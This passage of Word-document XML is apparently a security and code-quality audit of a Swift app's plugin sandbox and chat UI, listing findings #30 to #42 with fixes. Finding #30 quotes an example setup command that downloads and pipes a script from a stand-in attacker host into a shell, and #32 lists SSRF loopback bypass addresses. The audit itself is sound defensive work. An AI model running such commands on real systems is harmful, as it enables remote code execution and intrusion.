      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The tool execution framework, plugin loading and sandboxing, HostAPI bridge, SSRF protections, and container configuration were audited for injection vectors, privilege escalation, and isolation effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#30  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell Metacharacters Allowed in Setup Commands</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Services/Sandbox/SandboxSecurity.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 32-44)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">validateSetupCommand() only checks URLs via regex, ignoring shell metacharacters entirely. Commands like 'apk add pkg &amp;&amp; curl attacker.com/backdoor.sh | sh' pass validation because pipes, semicolons, and backticks are unchecked.</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Implement strict allowlist of setup operations (apk add, pip install, npm install). Reject commands containing |, &amp;, ;, backticks, or $() patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#31  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Header Injection via Plugin HostAPI</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Services/Plugin/PluginHostAPI.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1184-1187)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugin-provided HTTP headers are passed directly to URLRequest without validation. Plugins can inject Authorization, Host, Cookie headers or use newline characters for header splitting.</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Validate header names (alphanumeric + hyphens only). Reject values containing \r, \n, or \0. Block overriding of Authorization, Host, and Cookie headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#32  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF Protection Has IPv6 Loopback Bypass</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Services/Plugin/PluginHostAPI.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1386-1410)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF checks use string prefix matching for IPv6 and early-return on non-dotted-quad IPv4. [::1], full loopback 0000:...:0001, and IPv4-mapped addresses like ::ffff:127.0.0.1 all bypass protection.</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Use a proper IP address parser. Check for ::1, full loopback, and IPv4-mapped addresses. Remove the early return for non-dotted-quad hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#33  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal via Symlink TOCTOU in Plugin Seeding</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Managers/Plugin/SandboxPluginManager.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 108-119)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugin files are written via appendingPathComponent without re-validating the resolved path after directory creation. A symlink created between createDirectory and write could redirect files outside the plugin boundary.</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Verify the resolved path (following symlinks) stays within bounds before writing. Use open(O_CREAT | O_EXCL) for atomic create-and-write.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#34  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unquoted Working Directory in Shell Commands</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Services/Sandbox/SandboxManager.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 290-296)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Working directory is concatenated into shell commands without quoting: cd $cwd &amp;&amp; $command. Directories with spaces or metacharacters break or enable injection.</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Quote the variable: cd '${cwd}' &amp;&amp; ${command}. Better yet, use array-based execution that avoids shell parsing entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#35  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unvalidated apk Package Dependencies</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Managers/Plugin/SandboxPluginManager.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 453-465)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">System packages are installed via apk add --no-cache with no version pinning, checksum verification, or repository integrity validation.</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Require explicit version pinning (e.g., git=2.40.0-r1). Maintain a curated allowlist of permitted packages and versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#36  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Response Size Checked After Full Download</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Services/Plugin/PluginHostAPI.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1223-1228)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The 50MB response limit is checked after the entire response is buffered in memory, enabling memory exhaustion attacks.</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Implement streaming response handling with incremental size checks, or configure URLSession with a content-length pre-check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#37  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No Audit Logging for Plugin API Calls</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Services/Plugin/PluginHostAPI.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines All)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugin HostAPI calls (config_get, http_request, dispatch) are not logged, making it impossible to detect or investigate plugin abuse.</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Add structured logging of all HostAPI invocations with plugin ID, function, sanitized arguments, result, and duration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#38  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Dockerfile Uses Non-Deterministic latest Tag</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sandbox/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM alpine:latest is non-deterministic and may change between builds, causing inconsistent sandbox environments.</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Pin to specific version: FROM alpine:3.19@sha256:&lt;digest&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Views &amp; UI Patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The SwiftUI view layer, state management patterns, accessibility compliance, and rendering performance were audited for responsiveness, correctness, and inclusivity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#39  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Cascading @Published Redraws in ChatSession</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Views/Chat/ChatView.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 13-41)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ChatSession publishes 15+ properties individually. Every keystroke triggers view recalculation across the entire chat hierarchy. Model selection changes force full chat rebuild.</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Group related properties into ChatUIState struct. Separate persisted state from transient UI state. Use manual objectWillChange.send() for fine-grained control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#40  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Accessibility Labels on Interactive Elements</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Views/Chat/ (all message cells)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines Various)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Only 9 accessibility attributes found across 100+ view files. Action buttons (copy, regenerate, edit, delete) have no labels. Hover-revealed buttons are invisible to the accessibility tree. VoiceOver users cannot navigate chat.</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Add .accessibilityLabel() and .accessibilityHint() to all interactive elements. Group message content with .accessibilityElement(children: .combine). Tag message roles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#41  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unsafe nonisolated(unsafe) Observer References</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Views/Chat/ChatView.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 60-67, 140-150)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">NotificationCenter observers and Combine cancellables use nonisolated(unsafe), bypassing MainActor safety. If view hierarchy changes while notifications fire, memory safety violations occur.</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Use proper @MainActor isolation. Set up observers with queue: .main. Use [weak self] + Task { @MainActor in } for notification callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#42  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">FloatingInputCard 31-Parameter Init</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Views/Chat/FloatingInputCard.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 55-110)</w:t>
